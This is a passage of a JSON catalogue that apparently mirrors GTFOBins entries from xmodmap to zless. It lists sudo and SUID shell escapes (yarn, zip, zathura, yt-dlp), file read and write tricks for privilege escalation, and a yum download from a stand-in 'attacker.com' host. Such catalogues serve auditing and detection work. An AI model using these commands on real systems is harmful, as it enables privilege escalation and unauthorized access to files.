host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmodmap:file-read:0:sudo","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmodmap:file-read:0:suid","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmodmap:file-read:0:unprivileged","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmore:file-read:0:sudo","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xmore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmore:file-read:0:suid","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xmore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmore:file-read:0:unprivileged","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xmore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xpad:file-read:0:sudo","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xpad/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xpad:file-read:0:suid","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xpad/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xpad:file-read:0:unprivileged","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xpad/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-read:0:sudo","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-read:0:suid","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-read:0:unprivileged","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-write:0:sudo","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-write:0:suid","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-write:0:unprivileged","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xz:file-read:0:sudo","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xz/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xz:file-read:0:suid","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xz/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xz:file-read:0:unprivileged","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xz/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:0:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yarn exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:0:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yarn exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:1:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nyarn --cwd .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:1:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nyarn --cwd .","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:2:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nyarn --cwd . xxx","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:2:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nyarn --cwd . xxx","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yash:shell:0:sudo","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yash:shell:0:suid","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/yash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yash:shell:0:unprivileged","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yelp:file-read:0:sudo","toolId":"gtfo:yelp","toolName":"yelp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"yelp man:/path/to/input-file","description":"This spawns a graphical window containing the file content somehow corrupted by word wrapping.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yelp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yelp:file-read:0:unprivileged","toolId":"gtfo:yelp","toolName":"yelp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"yelp man:/path/to/input-file","description":"This spawns a graphical window containing the file content somehow corrupted by word wrapping.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yelp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yt-dlp:shell:0:sudo","toolId":"gtfo:yt-dlp","toolName":"yt-dlp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'","description":"The URL must point to a valid YouTube video which will be actually downloaded.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yt-dlp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yt-dlp:shell:0:unprivileged","toolId":"gtfo:yt-dlp","toolName":"yt-dlp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'","description":"The URL must point to a valid YouTube video which will be actually downloaded.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yt-dlp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yum:command:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"yum localinstall -y x-1.0-1.noarch.rpm","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install .x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yum:download:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"yum install http://attacker.com/path/to/input-file.rpm","description":"The file on the remote host must have the `.rpm` extension, but the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp/yum-root-xxxxxx/`.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yum:inherit:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"cat >/path/to/temp-dir/x<<EOF\n[main]\nplugins=1\npluginpath=/path/to/temp-dir/\npluginconfpath=/path/to/temp-dir/\nEOF\n\ncat >/path/to/temp-dir/y.conf<<EOF\n[main]\nenabled=1\nEOF\n\ncat >/path/to/temp-dir/y.py<<EOF\nimport yum\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\nrequires_api_version='2.1'\ndef init_hook(conduit):\n ...\nEOF\n\nyum -c /path/to/temp-dir/x --enableplugin=y","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zathura:shell:0:sudo","toolId":"gtfo:zathura","toolName":"zathura","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zathura\n:! /bin/sh -c 'exec /bin/sh 0<&1'","description":"The interaction happens in a GUI window, while the shell is dropped in the terminal.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zathura/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zathura:shell:0:unprivileged","toolId":"gtfo:zathura","toolName":"zathura","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zathura\n:! /bin/sh -c 'exec /bin/sh 0<&1'","description":"The interaction happens in a GUI window, while the shell is dropped in the terminal.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zathura/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zcat:file-read:0:sudo","toolId":"gtfo:zcat","toolName":"zcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zcat -f /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zcat:file-read:0:unprivileged","toolId":"gtfo:zcat","toolName":"zcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zcat -f /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zgrep:file-read:0:sudo","toolId":"gtfo:zgrep","toolName":"zgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zgrep:file-read:0:unprivileged","toolId":"gtfo:zgrep","toolName":"zgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zic:command:0:sudo","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zic:command:0:suid","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zic:command:0:unprivileged","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:file-read:0:sudo","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:file-read:0:suid","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:file-read:0:unprivileged","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:shell:0:sudo","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:shell:0:suid","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:shell:0:unprivileged","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zless:inherit:0:sudo","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zless/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zless:inherit:0:suid","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zless/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zless:inherit:0:unprivileged","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"zless 